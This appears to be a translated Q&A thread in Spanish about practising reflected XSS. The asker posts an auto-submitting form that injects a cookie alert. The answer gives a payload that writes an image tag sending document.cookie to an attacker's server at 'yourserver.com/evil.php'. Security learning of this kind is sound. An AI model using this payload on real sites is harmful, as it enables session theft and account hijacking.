XSS muestra cookies de otro sitio web

Navega tus respuestas
-1

Intentando practicar XSS en un sitio web ficticio. Mi objetivo final es mostrar las cookies de la víctima en mi sitio de "atacante". Actualmente, lo que tengo es que cuando el usuario ingrese a mi sitio, abrirá el sitio web ficticio y alertará a las víctimas a través de javascript. ¿Hay alguna forma de hacer que aparezca la alerta en mi sitio de atacante? 

<!DOCTYPE html>
<head></head>
<body>
    <form name ='xss_form' action='http://dummy_site.com/search' method="GET">
        <input type='hidden' name='query' value='<script>alert(document.cookie)</script>'>
    </form>

    <iframe name="hiddenFrame" style='display:none'></iframe>

    <script>
        document.xss_form.submit();
    </script>


</body>

El iframe se configura de manera que si hay una forma de mostrar el cuadro de alerta en mi sitio del atacante, puedo establecer el destino del formulario en el iframe y evitar la ventana emergente de dummy_site.

    
pregunta user3277633 23.11.2015 - 00:19
fuente

1 respuesta

3

Lo que estás tratando de hacer es imposible (con ese método). En primer lugar, el formulario se envía a un sitio web diferente, por lo que redirigirá el navegador fuera de su sitio. Además, el JavaScript se ejecutará en el otro sitio y no hay forma de usarlo para acceder a las cookies de un dominio diferente.

La solución sería configurar un servidor simple que registre los valores enviados a él. Inyecte un poco de XSS en el sitio web víctima como: <script>document.write('<img src="http://yourserver.com/evil.php?cookie='+document.cookie+'"/>')</script> , y haga que su servidor registre el valor del parámetro GET de la cookie.

    
respondido por el multithr3at3d 23.11.2015 - 00:46
fuente

Lea otras preguntas en las etiquetas

¿Cuál es el mejor método para IDS: heurístico o basado en firmas? [cerrado] Probando la funcionalidad de carga de archivos